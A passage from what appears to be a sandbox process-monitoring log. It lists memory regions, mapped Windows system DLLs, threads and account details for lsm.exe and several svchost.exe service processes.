"secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37388 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37389 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37390 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37391 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37392 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37393 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37394 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37395 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37396 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37397 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37398 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37399 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37400 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37405 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37406 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 37407 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 37408 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 37409 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 37410 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 37411 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37412 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37421 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 37422 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37444 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 37445 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 37446 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 37447 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37448 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37449 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37713 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 37714 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38520 start_va = 0x120000 end_va = 0x126fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 38521 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 38522 start_va = 0x280000 end_va = 0x281fff entry_point = 0x280000 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Thread: id = 1060 os_tid = 0x1dc Thread: id = 1085 os_tid = 0x244 Thread: id = 1113 os_tid = 0x2bc Thread: id = 1115 os_tid = 0x2c4 Thread: id = 1120 os_tid = 0x2d8 Thread: id = 1121 os_tid = 0x2dc Thread: id = 1122 os_tid = 0x2e0 Thread: id = 1123 os_tid = 0x2e4 Thread: id = 1126 os_tid = 0x2f0 Thread: id = 1128 os_tid = 0x2f8 Process: id = "670" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1120" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:000066e4" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 37100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 37102 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37103 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37104 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37105 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37106 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37107 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37108 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37111 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37113 start_va = 0xd0000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37114 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37115 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37116 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37117 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37118 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37119 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 37120 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37121 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37122 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37123 start_va = 0x260000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37128 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 37129 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37130 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 37131 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37132 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 37133 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 37134 start_va = 0x420000 end_va = 0x6eefff entry_point = 0x420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37135 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37136 start_va = 0x75340000 end_va = 0x75388fff entry_point = 0x75340000 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 37137 start_va = 0x75320000 end_va = 0x75334fff entry_point = 0x75320000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 37138 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37139 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37140 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37141 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37142 start_va = 0x754c0000 end_va = 0x754cdfff entry_point = 0x754c0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 37143 start_va = 0x140000 end_va = 0x15cfff entry_point = 0x140000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37144 start_va = 0x6f0000 end_va = 0x7b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 37145 start_va = 0x140000 end_va = 0x15cfff entry_point = 0x140000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37146 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37147 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37148 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 37149 start_va = 0x7c0000 end_va = 0x8c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 37150 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37151 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 37152 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37153 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37154 start_va = 0x8d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 37155 start_va = 0xbe0000 end_va = 0xfd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 37156 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37157 start_va = 0x8f0000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 37158 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 37159 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37160 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37161 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 37162 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 37163 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 37164 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 37165 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37166 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 37167 start_va = 0xb90000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 37168 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37169 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37170 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 37171 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37172 start_va = 0x752c0000 end_va = 0x752dffff entry_point = 0x752c0000 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 37173 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 37174 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37175 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37176 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37177 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37178 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37179 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37180 start_va = 0x752b0000 end_va = 0x752bafff entry_point = 0x752b0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 37181 start_va = 0xfe0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 37182 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 37183 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 37184 start_va = 0x1170000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 37185 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37186 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37187 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37188 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 37189 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 37190 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37191 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37192 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37193 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37194 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37195 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37196 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37197 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37198 start_va = 0x75250000 end_va = 0x75274fff entry_point = 0x75250000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37199 start_va = 0x75280000 end_va = 0x752a4fff entry_point = 0x75280000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37213 start_va = 0x11f0000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 37214 start_va = 0x75250000 end_va = 0x752aefff entry_point = 0x75250000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37215 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37216 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37227 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37228 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 37229 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37230 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37231 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37232 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37233 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37234 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37235 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37236 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37237 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37238 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 37239 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37240 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 37272 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 37273 start_va = 0x1270000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 37274 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 37377 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 37378 start_va = 0x360000 end_va = 0x376fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38107 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 38108 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38109 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 38110 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38126 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 38127 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 38779 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 38854 start_va = 0x13b0000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Thread: id = 1084 os_tid = 0x240 Thread: id = 1086 os_tid = 0x248 Thread: id = 1087 os_tid = 0x24c Thread: id = 1088 os_tid = 0x250 Thread: id = 1089 os_tid = 0x254 Thread: id = 1090 os_tid = 0x258 Thread: id = 1091 os_tid = 0x25c Thread: id = 1092 os_tid = 0x260 Thread: id = 1093 os_tid = 0x264 Thread: id = 1094 os_tid = 0x268 Thread: id = 1095 os_tid = 0x26c Thread: id = 1096 os_tid = 0x270 Thread: id = 1099 os_tid = 0x27c Thread: id = 1101 os_tid = 0x288 Thread: id = 1102 os_tid = 0x28c Thread: id = 1104 os_tid = 0x294 Thread: id = 1184 os_tid = 0x3e8 Process: id = "671" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1140" os_pid = "0x280" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a96e" [0xc000000f], "LOCAL" [0x7] Region: id = 37203 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37204 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 